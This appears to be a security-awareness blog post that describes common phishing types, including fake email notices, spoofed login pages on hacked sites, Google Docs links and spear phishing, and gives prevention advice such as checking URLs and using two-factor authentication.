Phishing is a serious threat to every individual and business. I’m sure that you have already received fraudulent email’s that appear to come from your bank, PayPal, or Amazon.
Some of these emails are easily recognized as fakes because of obvious grammatical or spelling errors. Some however are quite sophisticated and can easily fool even experienced individuals.
What do you know about phishing?
What is phishing?
Phishing is the fraudulent attempt to obtain sensitive information like login information or other personal identification information (PII), which is any data that could potentially identify a specific individual, such as:
Usernames,
Passwords,
Credit card details,
SSN (social security number),
Bank account information,
Email,
Phone number,
Secret question answers
Even partial information can increase the chances of success to subsequent social engineering attacks.
In a phishing attempt, something lures the victim pretending to be a trustworthy entity, such as:
Banks
Electronic communicators
Internet providers
Retail companies
Shops and others
Phishing attempts happen in many ways.
Deceptive email campaigns
Email phishing refers to the practice of sending emails that appear to be from a known or trusted sender with the objective of inducing victims to reveal their confidential information.
Phishing can be a targeted act or not. Today, it is easier for us not to notice these emails since anti-spam technology has evolved. Many of these messages are blocked and never reach our inboxes. If I suspect the validity of an email, the first thing I do is examine the email URL that it is sent from. Amazon.com.xyz is not a valid URL
Here is an example of a phishing campaign which attempted to trick WordPress site owners with a fake notification that their database required an update.
The phishing page was created on a hacked legitimate WordPress website. When clicking on the “Upgrade” button, a fake WordPress login page opens to collect the user credentials.
As part of email phishing, fake website pages are designed to look and sound authentic. Phishing emails usually say that you need to provide/verify/view something urgently and they provide you with a link. This link then leads you to the fake web pages.
Without these emails, there would not be many visitors for the phishing pages with the exception of phishing messages in social networks and SMS.
Carefully crafted phishing login pages convince users they are logging into a valid service. When users fail to notice the login page is fake, attackers receive their login details or credit card information. The stolen credentials and personal information are then used to perform identity theft and fraudulent activities.
This is an example of a fake page we found on a compromised website during an incident response. We identified a phishing directory called “login-apple-account” on a website. When accessing the path via HTTPS, users were led to a very convincing spoof of the Apple ID website:
Phishing in Google docs
Phishing campaigns in Google docs are a part of phishing email campaigns when hackers add malicious links to online documents.
It is quite common to share Google docs, so many people assume it is normal for an organization to share them via Google drive. When people click on Google Drive phishing links, they see something like this:
In this example, the address bar contains a fraudulent URL. However, not everybody pays attention to it and subsequently fall victim to such scams.
Spear phishing
In most types of phishing attacks, the targets are a wide group of people, for example, Google Docs users. However, in spear phishing attacks, the targets are specific individuals.
Highly targeted attacks are much less common than the other types of mass phishing attacks that we have already discussed, but they do occur.
Malicious actors can look up their victims on websites or even social media platforms, such as Facebook or Instagram, in order to craft a customized scam that can look legitimate.
Spear phishing attempts can be found via email or e-banking targeting a specific victim to read the communication (espionage) or are to steal a significant amount of money.
These attacks can target intermediary victims. Someone who has some sort of access to the intended victim (e.g., secretary, accountant, etc.) to use their account against more important people within the organization or to infect their computer with malware to access the organization’s internal network.
Preventive measures
Phishing attacks are widespread and with the holidays so close these malicious practices become even more common.
You should always pay attention to details when entering credentials anywhere on the web. Here are some red flags:
Suspicious URLs,
Lack of HTTPS,
Weird wording,
Typos,
Unknown email senders
Use 2FA (Two-Factor Authentication) whenever possible. If criminals steal your credentials, they will still not be able to use them without the second authentication means (SMS, Authentication app, hardware token, etc.).
Phishing is usually hard to detect because malicious pages are created deep inside the directory structure. People don’t normally check those directories and unless you know the exact URL of the phishing page, you would never know your site is hacked.
As a webmaster, it is advisable to have an account in Google Search Console to notify you about security problems, including phishing.
Website owners can also use specialized sites like PhishTank.com and VirusTotal.com to figure out if their site hosts phishing pages. Most phishing pages are placed on hacked sites.
